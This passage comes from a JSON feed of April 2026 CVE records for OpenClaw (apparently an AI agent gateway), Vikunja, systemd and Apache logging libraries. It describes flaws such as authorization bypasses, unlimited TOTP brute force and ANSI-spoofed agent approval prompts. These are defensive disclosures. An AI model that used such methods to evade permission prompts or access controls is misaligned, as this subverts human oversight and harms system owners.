Remote attackers can inject forged forwarding headers to bypass canvas authentication and rate-limiting protections by masquerading as loopback clients.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":6.3,"epss":0.00131,"ranking_epss":0.32548,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4","https://github.com/openclaw/openclaw/security/advisories/GHSA-844j-xrrq-wgh4","https://www.vulncheck.com/advisories/openclaw-xff-loopback-spoofing-bypass-in-canvas-authentication-and-rate-limiter"],"published_time":"2026-04-10T17:17:06","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35657","summary":"OpenClaw before 2026.3.25 contains an authorization bypass vulnerability in the HTTP /sessions/:sessionKey/history route that skips operator.read scope validation. Attackers can access session history without proper operator read permissions by sending HTTP requests to the vulnerable endpoint.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00023,"ranking_epss":0.06137,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/1c45123231516fa50f8cf8522ba5ff2fb2ca7aea","https://github.com/openclaw/openclaw/security/advisories/GHSA-5jvj-hxmh-6h6j","https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-http-session-history-route"],"published_time":"2026-04-10T17:17:06","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35647","summary":"OpenClaw before 2026.3.25 contains an access control vulnerability where verification notices bypass DM policy checks and reply to unpaired peers. 
Attackers can send verification notices to users outside allowed direct message policies by exploiting insufficient access validation before message transmission.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00028,"ranking_epss":0.07805,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/2383daf5c4a4e08d9553e0e949552ad755ef9ec2","https://github.com/openclaw/openclaw/security/advisories/GHSA-9wqx-g2cw-vc7r","https://www.vulncheck.com/advisories/openclaw-direct-message-policy-bypass-via-verification-notices"],"published_time":"2026-04-10T17:17:05","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35648","summary":"OpenClaw before 2026.3.22 contains a policy bypass vulnerability where queued node actions are not revalidated against current command policy when delivered. Attackers can exploit stale allowlists or declarations that survive policy tightening to execute unauthorized commands.","cvss":2.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":3.7,"cvss_v4":2.3,"epss":0.00027,"ranking_epss":0.0764,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2","https://github.com/openclaw/openclaw/security/advisories/GHSA-wj55-88gf-x564","https://www.vulncheck.com/advisories/openclaw-policy-bypass-via-unvalidated-queued-node-actions"],"published_time":"2026-04-10T17:17:05","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35649","summary":"OpenClaw before 2026.3.22 contains a settings reconciliation vulnerability that allows attackers to bypass intended deny-all revocations by exploiting empty allowlist handling. 
The vulnerability treats explicit empty allowlists as unset during reconciliation, silently undoing intended access control denials and restoring previously revoked permissions.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":6.3,"epss":0.00023,"ranking_epss":0.06179,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/security/advisories/GHSA-pw7h-9g6p-c378","https://www.vulncheck.com/advisories/openclaw-settings-reconciliation-bypass-via-empty-allowlist"],"published_time":"2026-04-10T17:17:05","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35650","summary":"OpenClaw before 2026.3.22 contains an environment variable override handling vulnerability that allows attackers to bypass the shared host environment policy through inconsistent sanitization paths. 
Attackers can supply blocked or malformed override keys that slip through inconsistent validation to execute arbitrary code with unintended environment variables.","cvss":7.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":7.7,"epss":0.00063,"ranking_epss":0.19476,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232","https://github.com/openclaw/openclaw/security/advisories/GHSA-39pp-xp36-q6mg","https://www.vulncheck.com/advisories/openclaw-environment-variable-override-bypass-via-inconsistent-sanitization"],"published_time":"2026-04-10T17:17:05","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35651","summary":"OpenClaw versions 2026.2.13 through 2026.3.24 contain an ANSI escape sequence injection vulnerability in approval prompts that allows attackers to spoof terminal output. Untrusted tool metadata can carry ANSI control sequences into approval prompts and permission logs, enabling attackers to manipulate displayed information through malicious tool titles.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07965,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/464e2c10a5edceb380d815adb6ff56e1a4c50f60","https://github.com/openclaw/openclaw/security/advisories/GHSA-4hmj-39m8-jwc7","https://www.vulncheck.com/advisories/openclaw-ansi-escape-sequence-injection-in-approval-prompt"],"published_time":"2026-04-10T17:17:05","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35652","summary":"OpenClaw before 2026.3.22 contains an authorization bypass vulnerability in interactive callback dispatch that allows non-allowlisted senders to execute action handlers. 
Attackers can bypass sender authorization checks by dispatching callbacks before normal security validation completes, enabling unauthorized actions.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":6.9,"epss":0.00044,"ranking_epss":0.13281,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66","https://github.com/openclaw/openclaw/security/advisories/GHSA-8883-9w57-vwv6","https://www.vulncheck.com/advisories/openclaw-unauthorized-action-execution-via-callback-dispatch"],"published_time":"2026-04-10T17:17:05","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35619","summary":"OpenClaw before 2026.3.24 contains an authorization bypass vulnerability in the HTTP /v1/models endpoint that fails to enforce operator read scope requirements. Attackers with only operator.approvals scope can enumerate gateway model metadata through the HTTP compatibility route, bypassing the stricter WebSocket RPC authorization checks.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07746,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/06de515b6c42816b62ec752e1c221cab67b38501","https://github.com/openclaw/openclaw/security/advisories/GHSA-68f8-9mhj-h2mp","https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-http-v1-models-endpoint"],"published_time":"2026-04-10T17:17:04","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35620","summary":"OpenClaw before 2026.3.24 contains missing authorization vulnerabilities in the /send and /allowlist chat command handlers. 
The /send command allows non-owner command-authorized senders to change owner-only session delivery policy settings, and the /allowlist mutating commands fail to enforce operator.admin scope. Attackers with operator.write scope can invoke /send on|off|inherit to persistently mutate the current session's sendPolicy, and execute /allowlist add commands to modify config-backed allowFrom entries and pairing-store allowlist entries without proper admin authorization.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":5.3,"epss":0.00055,"ranking_epss":0.17273,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/555b2578a8cc6e1b93f717496935ead97bfbed8b","https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2","https://github.com/openclaw/openclaw/commit/ea018a68ccb92dbc735bc1df9880d5c95c63ca35","https://github.com/openclaw/openclaw/security/advisories/GHSA-39mp-545q-w789","https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83","https://www.vulncheck.com/advisories/openclaw-missing-authorization-in-send-and-allowlist-chat-commands"],"published_time":"2026-04-10T17:17:04","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35621","summary":"OpenClaw before 2026.3.24 contains a privilege escalation vulnerability where the /allowlist command fails to re-validate gateway client scopes for internal callers, allowing operator.write-scoped clients to mutate channel authorization policy. 
Attackers can exploit chat.send to build an internal command-authorized context and persist channel allowFrom and groupAllowFrom policy changes reserved for operator.admin scope.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00029,"ranking_epss":0.08232,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-94pw-c6m8-p9p9","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence"],"published_time":"2026-04-10T17:17:04","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35641","summary":"OpenClaw before 2026.3.24 contains an arbitrary code execution vulnerability in local plugin and hook installation that allows attackers to execute malicious code by crafting a .npmrc file with a git executable override. During npm install execution in the staged package directory, attackers can leverage git dependencies to trigger execution of arbitrary programs specified in the attacker-controlled .npmrc configuration file.","cvss":8.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":8.4,"epss":6e-05,"ranking_epss":0.00375,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-m3mh-3mpg-37hw","https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-npmrc-in-local-plugin-hook-installation","https://github.com/openclaw/openclaw/security/advisories/GHSA-m3mh-3mpg-37hw"],"published_time":"2026-04-10T17:17:04","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35643","summary":"OpenClaw before 2026.3.22 contains an unvalidated WebView JavascriptInterface vulnerability allowing attackers to inject arbitrary instructions. 
Untrusted pages can invoke the canvas bridge to execute malicious code within the Android application context.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.6,"epss":0.00039,"ranking_epss":0.11446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/8b02ef133275be96d8aac2283100016c8a7f32e5","https://github.com/openclaw/openclaw/security/advisories/GHSA-cxmw-p77q-wchg","https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-unvalidated-webview-javascriptinterface"],"published_time":"2026-04-10T17:17:04","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35596","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the hasAccessToLabel function contains a SQL operator precedence bug that allows any authenticated user to read any label that has at least one task association, regardless of project access. Label titles, descriptions, colors, and creator information are exposed. This vulnerability is fixed in 2.3.0.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07339,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/fc216c38afaa51dd56dde7a97343d2148ecf24c1","https://github.com/go-vikunja/vikunja/pull/2578","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-hj5c-mhh2-g7jq"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35597","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the TOTP failed-attempt lockout mechanism is non-functional due to a database transaction handling bug. 
When a TOTP validation fails, the login handler in pkg/routes/api/v1/login.go calls HandleFailedTOTPAuth and then unconditionally rolls back. HandleFailedTOTPAuth in pkg/user/totp.go uses an in-memory counter (key-value store) to track failed attempts. When the counter reaches 10, it calls user.SetStatus(s, StatusAccountLocked) on the same database session s. Because the login handler always rolls back after a TOTP failure, the StatusAccountLocked write is undone. The in-memory counter correctly increments past 10, so the lockout code executes on every subsequent attempt, but the database write is rolled back every time. This allows unlimited brute-force attempts against TOTP codes. This vulnerability is fixed in 2.3.0.","cvss":5.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.9,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08848,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/6ca0151d02fa0e8c7e2181ab916a28e08caaaec8","https://github.com/go-vikunja/vikunja/pull/2576","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-fgfv-pv97-6cmj","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-fgfv-pv97-6cmj"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35598","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CalDAV GetResource and GetResourcesByList methods fetch tasks by UID from the database without verifying that the authenticated user has access to the task's project. Any authenticated CalDAV user who knows (or guesses) a task UID can read the full task data from any project on the instance. 
This vulnerability is fixed in 2.3.0.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07339,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/879462d717351fe5d276ddec5246bdec31b41661","https://github.com/go-vikunja/vikunja/pull/2579","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-48ch-p4gq-x46x","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-48ch-p4gq-x46x"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35599","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the addRepeatIntervalToTime function uses an O(n) loop that advances a date by the task's RepeatAfter duration until it exceeds the current time. By creating a repeating task with a 1-second interval and a due date far in the past, an attacker triggers billions of loop iterations, consuming CPU and holding a database connection for minutes per request. This vulnerability is fixed in 2.3.0.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00041,"ranking_epss":0.12357,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/6df0d6c8f54b01db6464c42810e40e55f12b481b","https://github.com/go-vikunja/vikunja/pull/2577","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-r4fg-73rc-hhh7"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35600","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, task titles are embedded directly into Markdown link syntax in overdue email notifications without escaping Markdown special characters. 
When rendered by goldmark and sanitized by bluemonday (which allows <a> and <img> tags), injected Markdown constructs produce phishing links and tracking pixels in legitimate notification emails. This vulnerability is fixed in 2.3.0.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/0f3730d045f20e261e3cdfc6d93c325653395b64","https://github.com/go-vikunja/vikunja/pull/2580","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-45q4-x4r9-8fqj"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35601","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CalDAV output generator builds iCalendar VTODO entries via raw string concatenation without applying RFC 5545 TEXT value escaping. User-controlled task titles containing CRLF characters break the iCalendar property boundary, allowing injection of arbitrary iCalendar properties such as ATTACH, VALARM, or ORGANIZER. This vulnerability is fixed in 2.3.0.","cvss":4.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.1,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07909,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/pull/2580","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2g7h-7rqr-9p4r","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2g7h-7rqr-9p4r"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35602","summary":"Vikunja is an open-source self-hosted task management platform. 
Prior to 2.3.0, the Vikunja file import endpoint uses the attacker-controlled Size field from the JSON metadata inside the import zip instead of the actual decompressed file content length for the file size enforcement check. By setting Size to 0 in the JSON while including large compressed file entries in the zip, an attacker bypasses the configured maximum file size limit. This vulnerability is fixed in 2.3.0.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10733,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/pull/2575","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-qh78-rvg3-cv54","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-qh78-rvg3-cv54"],"published_time":"2026-04-10T17:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35595","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CanUpdate check at pkg/models/project_permissions.go:139-148 only requires CanWrite on the new parent project when changing parent_project_id. However, Vikunja's permission model uses a recursive CTE that walks up the project hierarchy to compute permissions. Moving a project under a different parent changes the permission inheritance chain. When a user has inherited Write access (from a parent project share) and reparents the child project under their own project tree, the CTE resolves their ownership of the new parent as Admin (permission level 2) on the moved project. 
This vulnerability is fixed in 2.3.0.","cvss":8.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.3,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07976,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/c03d682f48aff890eeb3c8b41d38226069722827","https://github.com/go-vikunja/vikunja/pull/2583","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2vq4-854f-5c72"],"published_time":"2026-04-10T17:17:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22560","summary":"An open redirect vulnerability in Rocket.Chat versions prior to 8.4.0 allows users to be redirected to arbitrary URLs by manipulating parameters within a SAML endpoint.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.04065,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/RocketChat/Rocket.Chat/pull/38994","https://hackerone.com/reports/3418031"],"published_time":"2026-04-10T17:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40224","summary":"In systemd 259 before 260, there is local privilege escalation in systemd-machined because varlink can be used to reach the root namespace.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01622,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/systemd/systemd/security/advisories/GHSA-6pwp-j5vg-5j6m"],"published_time":"2026-04-10T16:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40225","summary":"In udev in systemd before 260, local root execution can occur via malicious hardware devices and unsanitized kernel 
output.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05138,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/systemd/systemd/security/advisories/GHSA-vpfq-8p5f-jcqx"],"published_time":"2026-04-10T16:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40226","summary":"In nspawn in systemd 233 through 259 before 260, an escape-to-host action can occur via a crafted optional config file.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00371,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/systemd/systemd/security/advisories/GHSA-9mj4-rrc3-gjcx"],"published_time":"2026-04-10T16:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40227","summary":"In systemd 260 before 261, a local unprivileged user can trigger an assert via an IPC API call with an array or map that has a null element.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04332,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/systemd/systemd/security/advisories/GHSA-848h-497j-8vjq"],"published_time":"2026-04-10T16:16:33","vendor":"systemd_project","product":"systemd","version":null},{"cve_id":"CVE-2026-40228","summary":"In systemd 259, systemd-journald can send ANSI escape sequences to the terminals of arbitrary users when a \"logger -p emerg\" command is executed, if ForwardToWall=yes is 
set.","cvss":2.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.9,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01851,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.openwall.com/lists/oss-security/2026/04/08/1"],"published_time":"2026-04-10T16:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35594","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, Vikunja's link share authentication (GetLinkShareFromClaims in pkg/models/link_sharing.go) constructs authorization objects entirely from JWT claims without any server-side database validation. When a project owner deletes a link share or downgrades its permissions, all previously issued JWTs continue to grant the original permission level for up to 72 hours (the default service.jwtttl). This vulnerability is fixed in 2.3.0.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00038,"ranking_epss":0.11202,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/379d8a5c19334ffe4846003f590e202c31a75479","https://github.com/go-vikunja/vikunja/pull/2581","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-96q5-xm3p-7m84","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-96q5-xm3p-7m84"],"published_time":"2026-04-10T16:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40021","summary":"Apache Log4net's  XmlLayout https://logging.apache.org/log4net/manual/configuration/layouts.html#layout-list  and  XmlLayoutSchemaLog4J https://logging.apache.org/log4net/manual/configuration/layouts.html#layout-list , in versions before 3.3.0, fail to sanitize characters forbidden by the  XML 1.0 specification https://www.w3.org/TR/xml/#charsets  in MDC property keys and values, as well as the identity field that may carry 
attacker-influenced data. This causes an exception during serialization and the silent loss of the affected log event.\n\nAn attacker who can influence any of these fields can exploit this to suppress individual log records, impairing audit trails and detection of malicious activity.\n\nUsers are advised to upgrade to Apache Log4net 3.3.0, which fixes this issue.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00119,"ranking_epss":0.30807,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4net/pull/280","https://lists.apache.org/thread/q8otftjswhk69n3kxslqg7cobr0x4st7","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4net/manual/configuration/layouts.html","https://logging.apache.org/security.html#CVE-2026-40021","http://www.openwall.com/lists/oss-security/2026/04/10/11"],"published_time":"2026-04-10T16:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40023","summary":"Apache Log4cxx's  XMLLayout https://logging.apache.org/log4cxx/1.7.0/classlog4cxx_1_1xml_1_1XMLLayout.html , in versions before 1.7.0, fails to sanitize characters forbidden by the  XML 1.0 specification https://www.w3.org/TR/xml/#charsets  in log messages, NDC, and MDC property keys and values, producing invalid XML output. 
Conforming XML parsers must reject such documents with a fatal error, which may cause downstream log processing systems to drop or fail to index affected records.\n\nAn attacker who can influence logged data can exploit this to suppress individual log records, impairing audit trails and detection of malicious activity.\n\nUsers are advised to upgrade to Apache Log4cxx 1.7.0, which fixes this issue.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00119,"ranking_epss":0.30807,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4cxx/pull/609","https://lists.apache.org/thread/y15cv3zblg3dfwr5vy6ddbnl4zyrzr8b","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4cxx/1.7.0/classlog4cxx_1_1xml_1_1XMLLayout.html","https://logging.apache.org/security.html#CVE-2026-40023","http://www.openwall.com/lists/oss-security/2026/04/10/12"],"published_time":"2026-04-10T16:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40223","summary":"In systemd 258 before 260, a local unprivileged user can trigger an assert when a Delegate=yes and User=<unset> unit exists and is running.","cvss":4.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.7,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02048,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/systemd/systemd/security/advisories/GHSA-x4h8-rrrg-q78f"],"published_time":"2026-04-10T16:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34478","summary":"Apache Log4j Core's  Rfc5424Layout https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout , in versions 2.21.0 through 2.25.3, is vulnerable to log injection via CRLF sequences due to undocumented renames of security-relevant configuration attributes.\n\nTwo distinct issues affect users of stream-based syslog services who configure Rfc5424Layout directly:\n\n  *  The 
newLineEscape attribute was silently renamed, causing newline escaping to stop working for users of TCP framing (RFC 6587), exposing them to CRLF injection in log output.\n  *  The useTlsMessageFormat attribute was silently renamed, causing users of TLS framing (RFC 5425) to be silently downgraded to unframed TCP (RFC 6587), without newline escaping.\n\n\nUsers of the SyslogAppender are not affected, as its configuration attributes were not modified.\n\nUsers are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00145,"ranking_epss":0.34861,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4j2/pull/4074","https://lists.apache.org/thread/3k1clr2l6vkdnl4cbhjrnt1nyjvb5gwt","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout","https://logging.apache.org/security.html#CVE-2026-34478","http://www.openwall.com/lists/oss-security/2026/04/10/7"],"published_time":"2026-04-10T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34479","summary":"The Log4j1XmlLayout from the Apache Log4j 1-to-Log4j 2 bridge fails to escape characters forbidden by the XML 1.0 standard, producing malformed XML output. 
Conforming XML parsers are required to reject documents containing such characters with a fatal error, which may cause downstream log processing systems to drop or fail to index affected records.\n\nTwo groups of users are affected:\n\n  *  Those using Log4j1XmlLayout directly in a Log4j Core 2 configuration file.\n  *  Those using the Log4j 1 configuration compatibility layer with org.apache.log4j.xml.XMLLayout specified as the layout class.\n\n\nUsers are advised to upgrade to Apache Log4j 1-to-Log4j 2 bridge version 2.25.4, which corrects this issue.\n\nNote: The Apache Log4j 1-to-Log4j 2 bridge is deprecated and will not be present in Log4j 3. Users are encouraged to consult the  Log4j 1 to Log4j 2 migration guide https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html , and specifically the section on eliminating reliance on the bridge.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00119,"ranking_epss":0.30807,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4j2/pull/4078","https://lists.apache.org/thread/gd0hp6mj17rn3kj279vgy4p7kd4zz5on","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html","https://logging.apache.org/security.html#CVE-2026-34479","http://www.openwall.com/lists/oss-security/2026/04/10/8"],"published_time":"2026-04-10T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34480","summary":"Apache Log4j Core's  XmlLayout https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout , in versions up to and including 2.25.3, fails to sanitize characters forbidden by the  XML 1.0 specification https://www.w3.org/TR/xml/#charsets  producing invalid XML output whenever a log message or MDC value contains such characters.\n\nThe impact depends on the StAX implementation in use:\n\n  *  JRE built-in StAX: Forbidden characters are silently written to the output, 
